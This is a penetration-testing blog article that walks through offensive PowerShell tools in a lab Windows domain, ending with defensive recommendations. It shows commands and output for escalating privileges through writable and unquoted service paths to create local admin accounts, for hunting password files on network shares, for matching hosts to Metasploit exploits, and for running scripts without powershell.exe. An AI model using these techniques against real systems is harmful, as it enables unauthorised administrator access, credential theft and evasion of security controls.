I want a "Red Teaming"
Michael Schneider
PowerShell is a tool with many uses. In earlier Labs articles, I have covered the basics of PowerShell in context of penetration testing and I’ve tried to block PowerShell. Here, I’ll show you how to use PowerShell as an offensive tool. To that effect, I have used PowerTools that is part of the Veil-Framework project.
PowerUp is a tool that supports local privilege escalation attacks against Microsoft Windows systems. It was developed by Will Schroeder alias @harmj0y. PowerUp consists of a PS1-File and is loaded into a PS-Session using the command Import-Module
. The function Invoke-AllChecks
checks the system configuration and lists possible attack vectors. Using this function on a Windows 9 client in my test environment, I have found two services that I can manipulate using normal user privileges.
PS C:\Tools\PowerUp> Invoke-AllChecks [*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [*] Checking for unquoted service paths... [*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse [+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe [+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe [*] Checking service executable permissions... [*] Use 'Write-ServiceEXE -ServiceName SVC' or 'Write-ServiceEXECMD' to abuse [+] Vulnerable service executable: ProcessExplorerService - C:\Program Files\procexp.exe [+] Vulnerable service executable: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe [*] Checking service permissions... [*] Checking for unattended install files... [*] Checking %PATH% for potentially hijackable .dll locations... [*] Checking for AlwaysInstallElevated registry key... [*] Checking for Autologon credentials in registry... [*] Checking for encrypted web.config strings... [*] Checking for encrypted application pool and virtual directory passwords...
There are two possible attack vectors for each service. The service ProccessExplorerService grants writing rights on file procexp.exe
to regular local users. Therefore, any other file can replace this file. There’s a PowerUp function called Write-ServiceEXE
that creates a file that in turn adds a local user to the system who has local administrator privileges. This file is used to overwrite the service’s file.
To retain the ability to reverse this process after successful user creation, the original file should be backed up. Write-ServiceEXE
automatically creates a backup of the file it replaces.
Before the attack, an attacker should check if the user account he uses has sufficient rights to create a copy of a file in the directory. Should this not be the case, the file needs to be backed up manually in order to remain as undetected as possible and to reverse the process once the file in the directory has been replaced.
The subsequent example creates an error message that says procexp.exe
has been overwritten but saving the file failed. Regardless of this, when the service starts up again, the manipulated file is executed and the user scip_admin
is created. The result: The attacker has a local administrator account at his disposal.
PS C:\Tools\PowerUp> Write-ServiceEXE -ServiceName ProcessExplorerService -UserName scip_admin Move-Item : Access to the path is denied. At C:\Tools\PowerUp\PowerUp.ps1:689 char:13 + Move-Item $ServicePath $BackupPath + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\Program Files\procexp.exe:FileInfo) [Move-Item], UnauthorizedAccessException + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand [*] Binary for service 'ProcessExplorerService' to create user 'scip_admin : Password123!' written to 'C:\Program Files\procexp.exe'
When they defined the service ProcessMonitorService the path to the executable was defined without using quotation marks. The complete path therefore is C:\Program Files\Sysinternal\Process Monitor\Procmon.exe
. When starting the service, Windows will look for executable files after every space. Therefore, it doesn’t look for just Procon.exe
but also for the following files, in case they exist:
C:\Program.exe
C:\Program Files\Sysinternal\Process.exe
In order to exploit this misconfiguration, an attacker needs the right to write to these directories. By default, unprivileged users do not have writing rights to directories filed under C:\Program Files
. In this example, the permissions of sub-directory Sysinternal
allow regular users to write files. Using the PowerUp function Write-UserAddServiceBinary
an attacker can create a file that creates a new user. This file is copied to directory Sysinternals
and will be named Process.exe
. When the service is restarted, a new user named scip_admin2
is created. The result: The attacker has a local administrator account at his disposal.
PowerView, also developed by Will Schroeder, is a tool that uses Windows domain function in order to gather information about a network and its users. All the tool’s options are sending legitimate requests that can be executed in the context of the rights of a domain user. Some functions, called MetaFunctions, have their origin in a toll named netview by Security Researchers Rob Fuller alias mubix. It doesn’t take much to find information about users, computers and shares.
PS C:\Tools\PowerView> Invoke-Netview Running Netview with delay of 0 [+] Domain Controller: dc01.labs.scip.ch [*] Total number of hosts: 2 [+] Server: dc01.labs.scip.ch [+] IP: 192.168.78.100 [+] dc01.labs.scip.ch - Share: ADMIN$ : Remote Admin [+] dc01.labs.scip.ch - Share: Backup$ : [+] dc01.labs.scip.ch - Share: C$ : Default share [+] dc01.labs.scip.ch - Share: Data : [+] dc01.labs.scip.ch - Share: IPC$ : Remote IPC [+] dc01.labs.scip.ch - Share: NETLOGON : Logon server share [+] dc01.labs.scip.ch - Share: SYSVOL : Logon server share [+] dc01.labs.scip.ch - Share: Users : [+] Server: client02.labs.scip.ch [+] IP: 192.168.78.135 [+] client02.labs.scip.ch - Logged-on - LABS\\sysop [+] client02.labs.scip.ch - Logged-on - LABS\\sysop [+] client02.labs.scip.ch - Logged-on - LABS\\sysop [+] client02.labs.scip.ch - Logged-on - LABS\\sysop [+] client02.labs.scip.ch - Logged-on - LABS\\jdoe [+] client02.labs.scip.ch - Share: ADMIN$ : Remote Admin [+] client02.labs.scip.ch - Share: C$ : Default share [+] client02.labs.scip.ch - Share: IPC$ : Remote IPC
The command Invoke-ShareFinder
crawls the network and lists shares by system. Even hidden shares appear in the list, suffixed with $
. These shares are not displayed in Windows Explorer’s default view. Using Invoke-FileFinder
, an attacker can search for files in the listed shares. Calling the function without any additional parameters, it looks for files containing the strings pass, sensitive, secret, admin, login or unattend*.xml in their filename. Additional parameters for searching for patterns as well as strings can be added using -Terms
. In the following example, I’ll search for ZIP files.
PS C:\Tools\PowerView> Invoke-FileFinder FullName : \\dc01.labs.scip.ch\Backup$\passwords.txt Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:40 LastWriteTime : 02.07.2015 07:18:06 Length : 44 PS C:\Tools\PowerView> Invoke-FileFinder -Terms *.zip FullName : \\dc01.labs.scip.ch\Backup$\backup-01.zip Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:13 LastWriteTime : 02.07.2015 07:17:13 Length : 0 FullName : \\dc01.labs.scip.ch\Backup$\backup-02.zip Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:25 LastWriteTime : 02.07.2015 07:17:13 Length : 0 FullName : \\dc01.labs.scip.ch\Backup$\backup-03.zip Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:32 LastWriteTime : 02.07.2015 07:17:13 Length : 0
Every computer object in the Active Directory has the version of the operating system including version and Service Pack added. The function Get-ExploitableSystems
reads this information and cross-references it with a list of publicly known exploits.
PS C:\Tools\PowerView> Get-ExploitableSystems ComputerName : dc01.labs.scip.ch OperatingSystem : Windows Server 2008 R2 Standard ServicePack : LastLogon : 02.07.2015 07:10:13 MsfModule : exploit/windows/smb/ms10_061_spoolss CVE : http://www.cvedetails.com/cve/2010-2729 ComputerName : dc01.labs.scip.ch OperatingSystem : Windows Server 2008 R2 Standard ServicePack : LastLogon : 02.07.2015 07:10:13 MsfModule : exploit/windows/smb/ms10_061_spoolss CVE : http://www.cvedetails.com/cve/2010-2729 ComputerName : dc01.labs.scip.ch OperatingSystem : Windows Server 2008 R2 Standard ServicePack : LastLogon : 02.07.2015 07:10:13 MsfModule : exploit/windows/smb/ms08_067_netapi CVE : http://www.cvedetails.com/cve/2008-4250 ComputerName : dc01.labs.scip.ch OperatingSystem : Windows Server 2008 R2 Standard ServicePack : LastLogon : 02.07.2015 07:10:13 MsfModule : exploit/windows/smb/ms09_050_smb2_negotiate_func_index CVE : http://www.cvedetails.com/cve/2009-3103
Project PowerPick by Pentester/Red-Teamer Justin Warner alias @sixdub has one goal: Use PowerShell features without powershell.exe
. It’s similar to PS2EXE that I spotlighted in A Story About Blocking PowerShell. While PS2EXE encapsulates a PS script in an executable file, SharpPick is able to execute arbitrary PS scripts originating in files, resources or URLs directly. To achieve this, the script is handed to sharppick.exe
as a parameters. Therefore, if powershell.exe
is blocked, PS scripts can still be executed.
C:\Program Files\Sysinternals>SharpPick.exe -f C:\Tools\PowerUp\PowerUp.ps1 [*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [*] Checking for unquoted service paths... [*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse [+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe [+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe
There’s no universal defence against the attacks named in this article. The defence against attacks like these begins in the configuration of the operating system and the network.
Apart from these measures there is a need for further control mechanisms such as a Whitelist for programs. If it is known which directories are used by running programs, then other directories such as the user profile should be set up so that the execution of files isn’t permitted. Also, make sure that executables aren’t allowed to be stored. Starting with Windows Server 2008, Microsoft has added the feature known as Filter Screening that defines which file types can be stored in shared folders. Using this feature, it’s possible to disable storing of executables.
Using a combination of control mechanisms, the attacks I’ve outlined in this article can be mitigated and the attack surface of a local system as well as the internal network can be significantly reduced.
Our experts will get in contact with you!
Michael Schneider
Michael Schneider
Michael Schneider
Michael Schneider
Our experts will get in contact with you!